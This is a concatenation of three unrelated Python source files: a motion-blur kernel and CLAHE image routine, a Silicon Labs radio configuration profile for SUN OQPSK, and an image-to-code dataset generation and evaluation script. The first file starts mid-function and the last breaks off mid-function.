step = np.random.beta(1, 30) * (1 - COMPLEXITY + eps) * DIAGONAL
if step < MAX_PATH_LEN:
steps.append(step)
# return the total number of steps and the steps
return len(steps), np.asarray(steps)
def getAngles(NUM_STEPS):
"""
Gets an angle for each step.
The maximal angle should be larger the more intense
the motion is, so it's sampled from a
U(0, complexity * pi).
Sample "jitter" from a beta(2,20) which is the
probability that the next angle has a different
sign than the previous one.
"""
# first get the max angle in radians
MAX_ANGLE = np.random.uniform(0, COMPLEXITY * math.pi)
# now sample "jitter" which is the probability that the
# next angle has a different sign than the previous one
JITTER = np.random.beta(2, 20)
# initialising angles (and sign of angle)
angles = [np.random.uniform(low=-MAX_ANGLE, high=MAX_ANGLE)]
while len(angles) < NUM_STEPS:
# sample next angle (absolute value)
angle = np.random.triangular(0, COMPLEXITY *
MAX_ANGLE, MAX_ANGLE + eps)
# with jitter probability change sign wrt previous angle
if np.random.uniform() < JITTER:
angle *= -np.sign(angles[-1])
else:
angle *= np.sign(angles[-1])
angles.append(angle)
# save angles
return np.asarray(angles)
# Get steps and angles
NUM_STEPS, STEPS = getSteps()
ANGLES = getAngles(NUM_STEPS)
# Turn them into a path
####
# turn angles and steps into complex numbers
complex_increments = polar2z(STEPS, ANGLES)
# generate path as the cumsum of these increments
path_complex = np.cumsum(complex_increments)
# find center of mass of path
com_complex = sum(path_complex) / NUM_STEPS
# shift path s.t. center of mass lies in the middle of
# the kernel and a apply a random rotation
###
# center it on center of mass
# center_of_kernel = (x + 1j * y) / 2
center_of_kernel = (SIZEx2[0] + 1j * SIZEx2[1]) / 2
path_complex -= com_complex
# randomly rotate path by an angle a in (0, pi)
path_complex *= np.exp(1j * np.random.uniform(0, math.pi))
# center COM on center of kernel
path_complex += center_of_kernel
# convert complex path to final list of coordinate tuples
return [(i.real, i.imag) for i in path_complex]
@preserve_channel_dim
def clahe(img, clip_limit=2.0, tile_grid_size=(8, 8)):
if img.dtype != np.uint8:
raise TypeError("clahe supports only uint8 inputs")
clahe_mat = cv2.createCLAHE(clipLimit=clip_limit, tileGridSize=tile_grid_size)
if len(img.shape) == 2 or img.shape[2] == 1:
img = clahe_mat.apply(img)
else:
img = cv2.cvtColor(img, cv2.COLOR_RGB2LAB)
img[:, :, 0] = clahe_mat.apply(img[:, :, 0])
img = cv2.cvtColor(img, cv2.COLOR_LAB2RGB)
return img
|
<reponame>lmnotran/gecko_sdk
from pyradioconfig.calculator_model_framework.interfaces.iprofile import IProfile
from pyradioconfig.parts.common.profiles.ocelot_regs import build_modem_regs_ocelot
from pyradioconfig.parts.common.profiles.profile_common import buildCrcOutputs, buildFecOutputs, buildFrameOutputs, \
buildWhiteOutputs
from pyradioconfig.parts.common.utils.units_multiplier import UnitsMultiplier
from pyradioconfig.parts.sol.profiles.sw_profile_outputs_common import sw_profile_outputs_common_sol
class Profile_SUN_OQPSK_Sol(IProfile):
def __init__(self):
self._profileName = "SUN_OQPSK"
self._readable_name = "SUN OQPSK Profile"
self._category = ""
self._description = "Profile used for SUN OQPSK PHYs"
self._default = False
self._activation_logic = ""
self._family = "sol"
self._sw_profile_outputs_common = sw_profile_outputs_common_sol()
def buildProfileModel(self, model):
# Build profile object and append it to the model
profile = self._makeProfile(model)
# Build inputs
self.build_required_profile_inputs(model, profile)
self.build_optional_profile_inputs(model, profile)
self.build_advanced_profile_inputs(model, profile)
self.build_hidden_profile_inputs(model, profile)
self.build_deprecated_profile_inputs(model, profile)
# Build outputs
self.build_register_profile_outputs(model, profile)
self.build_variable_profile_outputs(model, profile)
self.build_info_profile_outputs(model, profile)
def build_required_profile_inputs(self, model, profile):
self.make_required_input(profile, model.vars.base_frequency_hz, "operational_frequency",
readable_name="Base Channel Frequency", value_limit_min=358000000,
value_limit_max=956000000, units_multiplier=UnitsMultiplier.MEGA)
self.make_required_input(profile, model.vars.channel_spacing_hz, "operational_frequency",
readable_name="Channel Spacing", value_limit_min=0,
value_limit_max=10000000,
units_multiplier=UnitsMultiplier.KILO)
self.make_required_input(profile, model.vars.xtal_frequency_hz, "crystal",
readable_name="Crystal Frequency", value_limit_min=38000000,
value_limit_max=40000000, units_multiplier=UnitsMultiplier.MEGA)
self.make_required_input(profile, model.vars.sun_oqpsk_chiprate, "SUN",
readable_name="SUN OQPSK Chiprate", value_limit_min=model.vars.sun_oqpsk_chiprate.var_enum._100_KCPS, value_limit_max=model.vars.sun_oqpsk_chiprate.var_enum._2000_KCPS)
self.make_required_input(profile, model.vars.fcs_type_802154, 'SUN', readable_name="FCS Type (CRC)")
def build_optional_profile_inputs(self, model, profile):
pass
def build_advanced_profile_inputs(self, model, profile):
pass
def build_hidden_profile_inputs(self, model, profile):
# Hidden inputs to allow for fixed frame length testing
self.make_hidden_input(profile, model.vars.frame_length_type, 'frame_general',
readable_name="Frame Length Algorithm")
self.make_hidden_input(profile, model.vars.fixed_length_size, category='frame_fixed_length',
readable_name="Fixed Payload Size", value_limit_min=0, value_limit_max=0x7fffffff)
# Hidden inputs to allow for keeping absolute tolerance the same when testing at 915M
self.make_hidden_input(profile, model.vars.freq_offset_hz, 'Advanced',
readable_name="Frequency Offset Compensation (AFC) Limit", value_limit_min=0,
value_limit_max=500000, units_multiplier=UnitsMultiplier.KILO)
#Hidden input for dual front-end filter support
self.make_hidden_input(profile, model.vars.dual_fefilt, "Advanced",
readable_name="Dual front-end filter enable")
def build_deprecated_profile_inputs(self, model, profile):
pass
def build_register_profile_outputs(self, model, profile):
family = self._family
build_modem_regs_ocelot(model, profile, family)
buildFrameOutputs(model, profile, family)
buildCrcOutputs(model, profile, family)
buildWhiteOutputs(model, profile)
buildFecOutputs(model, profile)
def build_variable_profile_outputs(self, model, profile):
self._sw_profile_outputs_common.build_rail_outputs(model, profile)
self._sw_profile_outputs_common.build_ircal_outputs(model, profile)
def build_info_profile_outputs(self, model, profile):
self._sw_profile_outputs_common.build_info_outputs(model, profile)
def profile_calculate(self, model):
self._fixed_sun_oqpsk_vars(model)
self._lookup_from_oqpsk_chiprate(model)
def _fixed_sun_oqpsk_vars(self, model):
#AGC
self._fixed_sun_oqpsk_agc(model)
#OQPSK modulation on softmodem
model.vars.modulation_type.value_forced = model.vars.modulation_type.var_enum.OQPSK
model.vars.demod_select.value_forced = model.vars.demod_select.var_enum.SOFT_DEMOD
#Tolerance
model.vars.rx_xtal_error_ppm.value_forced = 0
model.vars.tx_xtal_error_ppm.value_forced = 0
model.vars.baudrate_tol_ppm.value_forced = 40
model.vars.deviation_tol_ppm.value_forced = 0
#Encoding and Whitening (unused)
model.vars.diff_encoding_mode.value_forced = model.vars.diff_encoding_mode.var_enum.DISABLED
model.vars.symbol_encoding.value_forced = model.vars.symbol_encoding.var_enum.NRZ
model.vars.manchester_mapping.value_forced = model.vars.manchester_mapping.var_enum.Default
model.vars.frame_coding.value_forced = model.vars.frame_coding.var_enum.NONE
model.vars.white_poly.value_forced = model.vars.white_poly.var_enum.NONE
model.vars.white_seed.value_forced = 0
model.vars.white_output_bit.value_forced = 0
#Preamble and syncword (unused)
model.vars.preamble_length.value_forced = 32
model.vars.preamble_pattern.value_forced = 0
model.vars.preamble_pattern_len.value_forced = 4
model.vars.syncword_0.value_forced = 0xe5
model.vars.syncword_1.value_forced = 0
model.vars.syncword_length.value_forced = 8
#Shaping (unused)
model.vars.shaping_filter.value_forced = model.vars.shaping_filter.var_enum.Custom_OQPSK
model.vars.shaping_filter_param.value_forced = 0.0
#Modulation parameters (unused)
model.vars.deviation.value_forced = 0
model.vars.fsk_symbol_map.value_forced = model.vars.fsk_symbol_map.var_enum.MAP0
#Frame settings (unused)
model.vars.frame_bitendian.value_forced = model.vars.frame_bitendian.var_enum.LSB_FIRST
model.vars.frame_length_type.value_forced = model.vars.frame_length_type.var_enum.FIXED_LENGTH
model.vars.payload_white_en.value_forced = False
model.vars.payload_crc_en.value_forced = False
model.vars.header_en.value_forced = True
model.vars.header_size.value_forced = 1
model.vars.header_calc_crc.value_forced = False
model.vars.header_white_en.value_forced = False
model.vars.var_length_numbits.value_forced = 8
model.vars.var_length_bitendian.value_forced = model.vars.var_length_bitendian.var_enum.LSB_FIRST
model.vars.var_length_shift.value_forced = 0
model.vars.var_length_minlength.value_forced = 5
model.vars.var_length_maxlength.value_forced = 0x7F
model.vars.var_length_includecrc.value_forced = False
model.vars.var_length_adjust.value_forced = 0
model.vars.var_length_byteendian.value_forced = model.vars.var_length_byteendian.var_enum.LSB_FIRST
model.vars.crc_seed.value_forced = 0x00000000
model.vars.crc_input_order.value_forced = model.vars.crc_input_order.var_enum.LSB_FIRST
model.vars.crc_bit_endian.value_forced = model.vars.crc_bit_endian.var_enum.MSB_FIRST
model.vars.crc_byte_endian.value_forced = model.vars.crc_byte_endian.var_enum.MSB_FIRST
model.vars.crc_pad_input.value_forced = False
model.vars.crc_invert.value_forced = False
model.vars.fixed_length_size.value_forced = 1
model.vars.frame_type_0_filter.value_forced = True
model.vars.frame_type_0_length.value_forced = 0
model.vars.frame_type_0_valid.value_forced = False
model.vars.frame_type_1_filter.value_forced = True
model.vars.frame_type_1_length.value_forced = 0
model.vars.frame_type_1_valid.value_forced = False
model.vars.frame_type_2_filter.value_forced = True
model.vars.frame_type_2_length.value_forced = 0
model.vars.frame_type_2_valid.value_forced = False
model.vars.frame_type_3_filter.value_forced = True
model.vars.frame_type_3_length.value_forced = 0
model.vars.frame_type_3_valid.value_forced = False
model.vars.frame_type_4_filter.value_forced = True
model.vars.frame_type_4_length.value_forced = 0
model.vars.frame_type_4_valid.value_forced = False
model.vars.frame_type_5_filter.value_forced = True
model.vars.frame_type_5_length.value_forced = 0
model.vars.frame_type_5_valid.value_forced = False
model.vars.frame_type_6_filter.value_forced = True
model.vars.frame_type_6_length.value_forced = 0
model.vars.frame_type_6_valid.value_forced = False
model.vars.frame_type_7_filter.value_forced = True
model.vars.frame_type_7_length.value_forced = 0
model.vars.frame_type_7_valid.value_forced = False
model.vars.frame_type_bits.value_forced = 3
model.vars.frame_type_loc.value_forced = 0
model.vars.frame_type_lsbit.value_forced = 0
#Other
model.vars.asynchronous_rx_enable.value_forced = False
model.vars.syncword_tx_skip.value_forced = False
def _fixed_sun_oqpsk_agc(self, model):
pass
def _lookup_from_oqpsk_chiprate(self, model):
#Read in the chiprate
sun_oqpsk_chiprate = model.profile.inputs.sun_oqpsk_chiprate.var_value
#Set the bitrate for SF1 (actual bitrate handled in softmodem since we don't know SF)
if sun_oqpsk_chiprate == model.vars.sun_oqpsk_chiprate.var_enum._100_KCPS:
bitrate = 100000
elif sun_oqpsk_chiprate == model.vars.sun_oqpsk_chiprate.var_enum._400_KCPS:
bitrate = 400000
elif sun_oqpsk_chiprate == model.vars.sun_oqpsk_chiprate.var_enum._1000_KCPS:
bitrate = 1000000
else:
bitrate = 2000000
model.vars.bitrate.value_forced = bitrate
model.vars.dsss_spreading_factor.value_forced = 1
model.vars.dsss_chipping_code.value_forced = 0xA47C
model.vars.dsss_len.value_forced = 16 |
<gh_stars>1-10
import json
import os
import random
from shutil import copyfile
from time import time
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image, ImageMath # Using https://pillow.readthedocs.io
import i2c_domain
from generator import Generator
from generator_static import ts
from i2c_domain import make_hand_crafted_examples
from i2c_render import render_to_file, render_to_img, render_to_img_with_phash
def i2c_gen(args):
print('i2c_gen(', args.gen_opts, ',', args.gen_dir, ')')
prepare_experiment(args.gen_opts, args.gen_dir)
def i2c_run(args):
print('i2c_run(', args.experiment_path, ',', args.img_paths, ')')
run_model(args.experiment_path, args.img_paths)
def main_prepare_experiment():
prepare_experiment('few_big', 'imgs/gen')
def run_model(experiment_path, img_paths):
if isinstance(img_paths, str):
img_paths = [img_paths]
print('TODO: Run model from experiment dir', experiment_path, 'on images', img_paths)
nm_path = '../neuralmonkey'
if not nm_path.endswith('/'):
nm_path += '/'
if not experiment_path.endswith('/'):
experiment_path += '/'
nm_run_path = nm_path + 'bin/neuralmonkey-run'
data_experiment_ini = experiment_path + 'data_experiment.ini'
data_ini = experiment_path + 'data_generated.ini'
input_file_path = experiment_path + 'data/run_imgs_generated.txt'
with open(input_file_path, 'w') as f_input_imgs:
for img_path in img_paths:
f_input_imgs.write("%s\n" % img_path)
print('input_img -> %s' % img_path)
cmd_str = 'python ' + nm_run_path + ' ' + data_experiment_ini + ' ' + data_ini
print(cmd_str)
os.system(cmd_str)
output_file_path = experiment_path + 'out/model_outputs_generated.txt'
codes = []
with open(output_file_path, 'r') as f_output_codes:
while True:
code_str = f_output_codes.readline().strip()
if code_str:
print('output_code -> %s' % code_str)
codes.append(code_str)
else:
print('')
break
print('codes:', codes)
return codes
def test_big_image():
experiment_path = 'imgs/results/results_haf_64/' # '../experiments/haf_64/'
# params
big_img_path = experiment_path + 'imgs_big/floral.png'
small_img_size = 64, 64
print('Test big image...')
def save_thumbnail(small_img_path, thumbnail_method):
try:
im = Image.open(big_img_path)
im.thumbnail(small_img_size, thumbnail_method)
im.save(small_img_path, "png")
print('Thumbnail for "%s" created: "%s"' % (big_img_path, small_img_path))
except IOError:
print('Cannot create thumbnail for "%s"' % big_img_path)
save_thumbnail(experiment_path + 'imgs_big/floral.small_0.png', Image.NEAREST)
save_thumbnail(experiment_path + 'imgs_big/floral.small_1.png', Image.ANTIALIAS)
save_thumbnail(experiment_path + 'imgs_big/floral.small_2.png', Image.LINEAR)
save_thumbnail(experiment_path + 'imgs_big/floral.small_3.png', Image.CUBIC)
save_thumbnail(experiment_path + 'imgs_big/floral.small_4.png', Image.BOX)
save_thumbnail(experiment_path + 'imgs_big/floral.small_5.png', Image.HAMMING)
def prepare_experiment(gen_opts_template_name='small', path='imgs/gen'):
# Parameters:
# path ... 'imgs/gen' '../ubuntu-cabin/experiment/data'
# gen_opts_template_name ... '003similar'
domain_maker_name = 'family_1'
train_validate_ratio = 0.8
target_name = 'prefix'
generate_handmade_examples = True
hash_opts = {
'hash_size': 32,
'highfreq_factor': 4
}
# Derived parameters: Various gen_opts templates:
dim_size = 32
img_size = (dim_size, dim_size)
if not path.endswith('/'):
path += '/'
gen_opts_full = {
'max_tree_size': 51,
'exhaustive_generating_limit': 250000,
'sample_method': {'name': 'fixed_attempts', 'num_attempts': 20000},
'domain_maker': domain_maker_name,
'hash_opts': hash_opts,
'img_size': img_size,
'path': path
}
gen_opts_requested_128 = {
'max_tree_size': 13,
'exhaustive_generating_limit': 250000,
'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100000},
'domain_maker': 'family_1',
'hash_opts': hash_opts,
'img_size': (128, 128),
'path': path
}
gen_opts_requested_64 = {
'max_tree_size': 13,
'exhaustive_generating_limit': 250000,
'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100000},
'domain_maker': 'family_1',
'hash_opts': hash_opts,
'img_size': (64, 64),
'path': path
}
gen_opts_003similar = {
'max_tree_size': 13,
'exhaustive_generating_limit': 250000,
'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100000},
'domain_maker': 'family_1',
'hash_opts': hash_opts,
'img_size': img_size,
'path': path
}
gen_opts_small = {
'max_tree_size': 17,
'exhaustive_generating_limit': 2500,
'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100},
'domain_maker': domain_maker_name,
'hash_opts': hash_opts,
'img_size': img_size,
'path': path
}
gen_opts_few_big = {
'min_tree_size': 63,
'max_tree_size': 63,
'exhaustive_generating_limit': 2500,
'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100},
'domain_maker': domain_maker_name,
'hash_opts': hash_opts,
'img_size': (512, 512),
'path': path
}
gen_opts_lib = {
'full': gen_opts_full,
'requested_128': gen_opts_requested_128,
'requested_64': gen_opts_requested_64,
'003similar': gen_opts_003similar,
'small': gen_opts_small,
'few_big': gen_opts_few_big
}
# Run quick example generation, handy for visual check that imggenerator works properly.
if generate_handmade_examples:
save_hand_crafted_examples((512, 512), path + 'imgs/handmade_examples/')
# Generate dataset (not yet split into train and validate subsets)
gen_opts = gen_opts_lib[gen_opts_template_name]
generate_dataset(gen_opts)
# Split generated dataset to subsets (i.e. train, validate)
split_dataset(gen_opts, target_name, train_validate_ratio)
def split_dataset(gen_opts, target_name, train_validate_ratio):
input_name = 'imgs'
path_experiment_dir = gen_opts['path']
if not path_experiment_dir.endswith('/'):
path_experiment_dir += '/'
path_imgs_txt = gen_opts['paths'][input_name]
path_targets_txt = gen_opts['paths'][target_name]
dataset = []
zip_files(path_imgs_txt, path_targets_txt, lambda img, code: dataset.append((img, code)))
num_all = len(dataset)
num_train = int(round(num_all * train_validate_ratio))
num_valid = num_all - num_train
random.shuffle(dataset)
train_dataset = dataset[:num_train]
valid_dataset = dataset[num_train:num_all]
if len(train_dataset) != num_train:
raise RuntimeError('Wrong number of train instances.')
if len(valid_dataset) != num_valid:
raise RuntimeError('Wrong number of validation instances.')
def generate_subset_files(prefix, sub_dataset):
prefix = path_experiment_dir + prefix
inputs_filename = prefix + '_' + input_name + '.txt'
targets_filename = prefix + '_' + target_name + '.txt'
with open(inputs_filename, 'w') as f_inputs:
with open(targets_filename, 'w') as f_targets:
for (img, code) in sub_dataset:
f_inputs.write("%s\n" % img)
f_targets.write("%s\n" % code)
generate_subset_files('train', train_dataset)
generate_subset_files('dev', valid_dataset)
def main():
save_hand_crafted_examples((512, 512)) # Run quick example generation ..
path = 'imgs/gen'
dim_size = 32
img_size = (dim_size, dim_size)
hash_opts = {
'hash_size': 32,
'highfreq_factor': 4
}
gen_opts_full = {
'max_tree_size': 51,
'exhaustive_generating_limit': 250000,
'sample_method': {
'name': 'fixed_attempts',
'num_attempts': 20000
},
'domain_maker': 'family_1',
'hash_opts': hash_opts,
'img_size': img_size,
'path': path
}
gen_opts_requested = {
'max_tree_size': 13,
'exhaustive_generating_limit': 250000,
'sample_method': {
'name': 'fixed_attempts',
'num_attempts': 100000
},
'domain_maker': 'family_1',
'hash_opts': hash_opts,
'img_size': (128, 128),
'path': path
}
gen_opts_test = {
'max_tree_size': 17,
'exhaustive_generating_limit': 2500,
'sample_method': {
'name': 'fixed_attempts',
'num_attempts': 100
},
'domain_maker': 'family_1',
'hash_opts': hash_opts,
'img_size': img_size,
'path': path
}
generate_dataset(gen_opts_test)
# generate_dataset(gen_opts_full)
# generate_dataset(gen_opts_requested)
def main_process_results():
dataset_id = 'haf_64' # '003'
results_root_dir_path = 'imgs/results/'
results_dir_path = results_root_dir_path + 'results_' + dataset_id + '/'
inputs_path = results_dir_path + 'dev_imgs.txt'
outputs_path = results_dir_path + 'prefixes_out.txt'
report_path = results_dir_path + 'report.html'
report_template_path = results_root_dir_path + 'js/report.html'
report_js_path = results_dir_path + 'report-data.js'
dataset_path = results_dir_path + 'dataset/'
dataset_imgs_path = dataset_path + 'imgs.txt'
dataset_prefix_path = dataset_path + 'prefix.txt'
in_imgs_path = results_dir_path + 'imgs/'
out_imgs_path = results_dir_path + 'imgs_out/'
ensure_dir(out_imgs_path)
# open(report_path, 'w').close()
open(report_js_path, 'w').close()
worst_err = 0.0
sum_err = 0.0
# report = ''
i = 0
rows = []
num_absolute_matches = 0
errs = []
num_mismatches = 0
correct_codes = {}
with open(inputs_path) as f_in:
with open(outputs_path) as f_out:
# report += '<table border="1">\n'
# report += '<tr><th>input</th><th>output</th><th>error</th>\n'
while True:
in_line = f_in.readline().strip()
out_line = f_out.readline().strip()
if (not in_line) or (not out_line):
break
corrected_code, mismatch = from_prefix_notation_family_1(out_line)
correct_codes[in_line] = ''
in_img_path = in_imgs_path + in_line
out_img_path = out_imgs_path + in_line
input_im = Image.open(in_img_path)
if not os.path.isfile(out_imgs_path):
render_to_file(out_img_path, input_im.size, corrected_code)
output_im = Image.open(out_img_path)
err = imgs_err(input_im, output_im)
errs.append(err)
sum_err += err
if err == 0.0:
num_absolute_matches += 1
if err > worst_err:
worst_err = err
rows.append([in_line, out_line, err])
# report += '<tr><td>%s</td><td>%s</td><td><pre>%.10f</pre></td></tr>\n'%(in_img_html,out_img_html,err)
print("%s -> %s ... %.10f ... mismatch=%d" % (in_line, out_line, err, mismatch))
if mismatch != 0:
num_mismatches += 1
print('---> mismatch != 0')
i += 1
# report += '</table>\n'
def step(img_filename, correct_prefix):
if img_filename in correct_codes:
correct_codes[img_filename] = correct_prefix
zip_files(dataset_imgs_path, dataset_prefix_path, step)
stats = {
'num_test_instances': i,
'num_absolute_matches': num_absolute_matches,
'percent_absolute_matches': (100.0 * num_absolute_matches / i),
'mean_error': (sum_err / i),
'worst_error': worst_err,
'num_mismatches': num_mismatches
}
stats_str = '\n'
stats_str += 'Number of test instances: %d\n' % stats['num_test_instances']
stats_str += 'Number of absolute matches: %d\n' % stats['num_absolute_matches']
stats_str += 'Percent absolute matches: %f\n' % stats['percent_absolute_matches']
stats_str += 'Mean error: %.5f\n' % stats['mean_error']
stats_str += 'Worst error: %.10f\n' % stats['worst_error']
stats_str += 'Number of output codes in incorrect format: %d\n' % stats['num_mismatches']
print(stats_str)
print('Generating report.html ...')
rows.sort(key=lambda r: -r[2])
for row in rows:
row[1] = row[1], correct_codes[row[0]]
err_hist_filename = 'error_hist.png'
copyfile(report_template_path, report_path)
report_json = {
'stats': stats,
'table': rows
}
with open(report_js_path, 'w') as f_report_js:
f_report_js.write('report_data = %s;' % json.dumps(report_json, indent=0))
plt.title('Histogram of error on test data')
plt.xlabel('Error')
plt.ylabel('N')
plt.hist(errs, bins=23)
plt.savefig(results_dir_path + err_hist_filename)
# plt.show()
print('Done.')
def test_histogram():
print('Testing histogram, bro.')
data = np.random.randn(1000)
plt.hist(data)
plt.show()
def process_raw_dataset(data_path, classes_info, num_instances_per_class, train_validate_ratio):
ensure_dir(data_path)
num_train = int(round(num_instances_per_class * train_validate_ratio))
train_path = ensure_dir(data_path + 'train/')
valid_path = ensure_dir(data_path + 'validation/')
for info in classes_info:
name, num, class_path = info['name'], info['num'], info['path']
print("%s : %d" % (name, num))
filenames = os.listdir(class_path)
if len(filenames) != num:
raise RuntimeError('Wrong number of instances in ' + class_path)
random.shuffle(filenames)
src_dst_pairs = [(f, f) for f in filenames]
if num < num_instances_per_class:
num_to_copy = num_instances_per_class - num
for i in range(num_to_copy):
src = filenames[i % num]
dst = 'c' + str(i + 1) + '_' + src
src_dst_pairs.append((src, dst))
train_c_path = ensure_dir(train_path + name + '/')
valid_c_path = ensure_dir(valid_path + name + '/')
random.shuffle(src_dst_pairs)
for (src, dst) in src_dst_pairs[:num_train]:
src_path = class_path + src
dst_path = train_c_path + dst
copyfile(src_path, dst_path)
for (src, dst) in src_dst_pairs[num_train:num_instances_per_class]:
src_path = class_path + src
dst_path = valid_c_path + dst
copyfile(src_path, dst_path)
def make_classes_info(classes_path, class_names_path, correct_classes_path):
class_names = {}
with open(correct_classes_path, 'r') as f:
while True:
name = f.readline().strip()
if not name:
break
if name in class_names:
class_names[name]['num'] += 1
else:
class_names[name] = {'name': name, 'num': 1, 'path': classes_path + name + '/'}
classes_info = sorted(class_names.values(), key=lambda o: -o['num'])
print(classes_info)
with open(class_names_path, 'w') as f:
f.write(json.dumps(classes_info, indent=2))
def prepare_nn_dataset_raw(imgs_path, classes_path, img_filenames_path, correct_classes_path):
ensure_dir(classes_path)
def step(img_filename, correct_class):
class_path = classes_path + correct_class + '/'
ensure_dir(class_path)
src_filename = imgs_path + img_filename
dst_filename = class_path + img_filename
copyfile(src_filename, dst_filename)
print("%s -> %s" % (src_filename, dst_filename))
zip_files(img_filenames_path, correct_classes_path, step)
def zip_files(path1, path2, f):
with open(path1) as f1:
with open(path2) as f2:
while True:
line1 = f1.readline().strip()
line2 = f2.readline().strip()
if (not line1) or (not line2):
break
f(line1, line2)
def generate_dataset(gen_opts):
start_time = time()
gen_opts['paths'] = init_files(gen_opts['path'])
save_stats_header(gen_opts)
domain_maker = i2c_domain.family_lib[gen_opts['domain_maker']]
goal, gamma = domain_maker()
gen = Generator(gamma)
img_hashes = {}
next_img_id = 1
attempt = 0
min_tree_size = gen_opts.get('min_tree_size', 1)
max_tree_size = gen_opts['max_tree_size']
exhaustive_generating_limit = gen_opts['exhaustive_generating_limit']
sample_method = gen_opts['sample_method']
sample_method_name = sample_method['name']
for tree_size in range(min_tree_size, max_tree_size + 1):
one_size_start_time = time()
num_trees = gen.get_num(tree_size, goal)
next_img_id_start = next_img_id
print('tree_size =', tree_size, "-> num_trees =", num_trees)
if num_trees > 0:
if num_trees < exhaustive_generating_limit:
gen_method_name = 'exhaustive'
num_attempts = num_trees
for tree_data in ts(gamma, tree_size, goal, 0):
tree = tree_data.tree
attempt += 1
next_img_id = generate_step(gen_opts, tree, img_hashes, tree_size, next_img_id, attempt)
else:
gen_method_name = sample_method_name
if sample_method_name == 'fixed_attempts':
num_attempts = sample_method['num_attempts']
for i_sample in range(num_attempts):
tree = gen.gen_one(tree_size, goal)
attempt += 1
next_img_id = generate_step(gen_opts, tree, img_hashes, tree_size, next_img_id, attempt)
else:
num_attempts = -1
print('WARNING: Using unsupported sampling method.')
new_for_this_size = next_img_id - next_img_id_start
one_size_delta_time = time() - one_size_start_time
save_stats_size_info(gen_opts, tree_size, num_trees, gen_method_name, num_attempts, new_for_this_size,
one_size_delta_time)
# save stats and we are done ..
num_generated_trees = next_img_id - 1
delta_time = time() - start_time
save_stats_footer(gen_opts, num_generated_trees, attempt, delta_time)
print(gen_opts['stats'])
def generate_step(gen_opts, tree, img_hashes, tree_size, next_img_id, attempt):
img_code = tree.to_sexpr_json()
im, img_hash = render_to_img_with_phash(gen_opts, img_code)
if img_hash not in img_hashes:
img_hashes[img_hash] = tree_size
save_generated_tree_data(gen_opts, next_img_id, im, img_code, tree, tree_size, attempt)
return next_img_id + 1
else:
return next_img_id
def init_files(path):
if not path.endswith('/'):
path += '/'
ensure_dir(path)
imgs_path = path + 'imgs/'
ensure_dir(imgs_path)
img_pattern_short = '%08d.png'
paths = {
'img_pattern_short': img_pattern_short,
'img_pattern': imgs_path + img_pattern_short,
'imgs': path + 'imgs.txt',
'stats': path + 'stats.md',
'jsons': path + 'jsons.txt',
'prefix': path + 'prefix.txt',
'roots': path + 'roots.txt'
}
open(paths['imgs'], 'w').close()
open(paths['stats'], 'w').close()
open(paths['jsons'], 'w').close()
open(paths['prefix'], 'w').close()
open(paths['roots'], 'w').close()
return paths
def save_generated_tree_data(gen_opts, img_id, im, img_code, tree, tree_size, attempt):
paths = gen_opts['paths']
im.save(paths['img_pattern'] % img_id, 'PNG')
root_sym = root_symbol(img_code)
prefix_code = to_prefix_notation(img_code)
append_line(paths['imgs'], paths['img_pattern_short'] % img_id)
append_line(paths['roots'], root_sym)
append_line(paths['prefix'], prefix_code)
append_line(paths['jsons'], str(img_code))
print('%-7d->' % img_id, paths['img_pattern'] % img_id, "attempt=%d" % attempt, "tree_size=%d" % tree_size)
# print('\t\ttree =', tree)
# print('\t\ts-expr =', img_code)
print('\t\ttree =', prefix_code)
def save_stats_header(gen_opts):
stats = '# Stats #\n\n'
stats += '## gen_opts ##\n\n'
gen_opts_pretty_json = json.dumps(gen_opts, sort_keys=True, indent=2, separators=(',', ': '))
stats += '```json\n%s\n```\n\n' % gen_opts_pretty_json
stats += '## Stats for tree sizes ##\n\n'
row = 'Tree size', 'Num of all trees', 'Generating method', 'Attempts', 'New trees', 'New/Attempts %', 'Time'
stats += '| %-9s | %-40s | %-17s | %-10s | %-10s | %-14s | %-14s |\n' % row
stats += '| %s | %s | %s | %s | %s | %s | %s |\n' % (
'-' * 9, '-' * 40, '-' * 17, '-' * 10, '-' * 10, '-' * 14, '-' * 14)
gen_opts['stats'] = ''
append_stats(gen_opts, stats)
def save_stats_size_info(gen_opts, tree_size, num_trees, gen_method_name, num_attempts, new_for_this_size, time):
new_to_attempts_percent = (100.0 * new_for_this_size) / num_attempts
row = tree_size, num_trees, gen_method_name, num_attempts, new_for_this_size, new_to_attempts_percent, time
stats = '| %-9d | %-40d | %-17s | %-10d | %-10d | %-14.2f | %-14.2f |\n' % row
append_stats(gen_opts, stats)
def save_stats_footer(gen_opts, num_generated_trees, attempts, delta_time):
stats = '\n## Final stats ##\n\n'
stats += '* Num Generated Images: %d\n' % num_generated_trees
stats += '* Num Attempts: %d\n' % attempts
stats += '* Generating Time: %.2f s\n' % delta_time
stats += '* Average attempt time: %f s\n' % (delta_time / attempts)
stats += '* Average new tree time: %f s\n' % (delta_time / num_generated_trees)
append_stats(gen_opts, stats)
def append_stats(gen_opts, stats):
with open(gen_opts['paths']['stats'], 'a') as stats_file:
stats_file.write(stats)
gen_opts['stats'] += stats
def save_hand_crafted_examples(img_size, dir_path='imgs/handmade/'):
codes = make_hand_crafted_examples()
ensure_dir(dir_path)
filename_pat = dir_path + '%03d.png'
for i, code in enumerate(codes):
render_to_file(filename_pat % (i + 1), img_size, code)
def append_line(filename, line):
with open(filename, 'a') as f:
f.write("%s\n" % line)
def ensure_dir(file_path):
directory = os.path.dirname(file_path)
if not os.path.exists(directory):
os.makedirs(directory)
return file_path
def does_dir_exist(file_path):
return os.path.exists(os.path.dirname(file_path))
def does_file_exist(file_path):
return os.path.isfile(file_path)
def root_symbol(code):
if isinstance(code, list):
return root_symbol(code[0])
else:
return code
def to_prefix_notation(code):
return ' '.join(to_prefix_json(code))
def to_prefix_json(code):
if isinstance(code, list):
return sum([to_prefix_json(arg) for arg in code], [])
else:
return [code]
def from_prefix_notation(prefix_notation_str, arity_dict, default_sym):
prefix_list = prefix_notation_str.strip().split()
mismatch = compute_prefix_mismatch(prefix_list, arity_dict)
if mismatch < 0:
del prefix_list[mismatch:] # Too many symbols, we cut off last -mismatch elements.
elif mismatch > 0:
prefix_list += [default_sym] * mismatch # To few symbols, we add default symbols.
return from_prefix_list(prefix_list, arity_dict), mismatch
def from_prefix_list(prefix_list, arity_dict):
stack = []
for sym in reversed(prefix_list):
